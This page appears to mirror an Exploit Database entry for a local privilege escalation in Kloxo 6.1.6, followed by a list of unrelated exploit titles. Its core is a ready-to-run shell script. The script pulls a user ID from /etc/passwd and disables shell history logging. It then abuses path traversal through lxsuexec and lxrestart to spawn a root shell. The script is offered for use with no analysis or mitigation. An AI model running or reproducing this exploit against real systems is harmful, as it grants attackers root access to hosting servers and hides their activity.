Kloxo 6.1.6 – Local Privilege Escalation

Exploit Database
79 阅读

作者： HTP

日期： 2013-05-13
类别：
- local
平台：
- linux
来源：https://www.exploit-db.com/exploits/25406/

#!/bin/sh
# Exploit Title: Kloxo Local Privilege Escalation
# Google Dork: inurl:kiddies
# Date: August 2012 or so
# Exploit Author: HTP
# Vendor Homepage: http://lxcenter.org/
# Software Link: [download link if available]
# Version: 6.1.6 (Latest)
# Tested on: CentOS 5
# CVE : None
# This exploit requires you to be the Apache user, or another capable of running lxsuexec.
LXLABS=`cat /etc/passwd | grep lxlabs | cut -d: -f3`
export MUID=$LXLABS
export GID=$LXLABS
export TARGET=/bin/sh
export CHECK_GID=0
export NON_RESIDENT=1
echo "unset HISTFILE HISTSAVE PROMPT_COMMAND TMOUT" >> /tmp/w00trc
echo "/usr/sbin/lxrestart '../../../bin/bash --init-file /tmp/w00trc #' " > /tmp/lol
lxsuexec /tmp/lol

last Exploits
Kloxo 6.1.6 – Local Privilege Escalation的更多信息

NETGATE Data Backup 3.0.620 – ‘NGDatBckpSrv’ Unquoted Service Path：
Foxit PDF Reader 9.0.1.1049 – Pointer Overwrite Use-After-Free (Metasploit)：
Studio 5000 Logix Designer 30.01.00 – ‘FactoryTalk Activation Service’ Unquoted Service Path：
ActivePerl 5.8.8.817 – Local Buffer Overflow：
Trend Micro Anti-Threat Toolkit 1.62.0.1218 – Remote Code Execution：
Google Chrome 109.0.5414.74 – Code Execution via missing lib file (Ubuntu)：
MiniTool Partition Wizard – Unquoted Service Path：
xorg-x11-server < 1.20.1 - Local Privilege Escalation：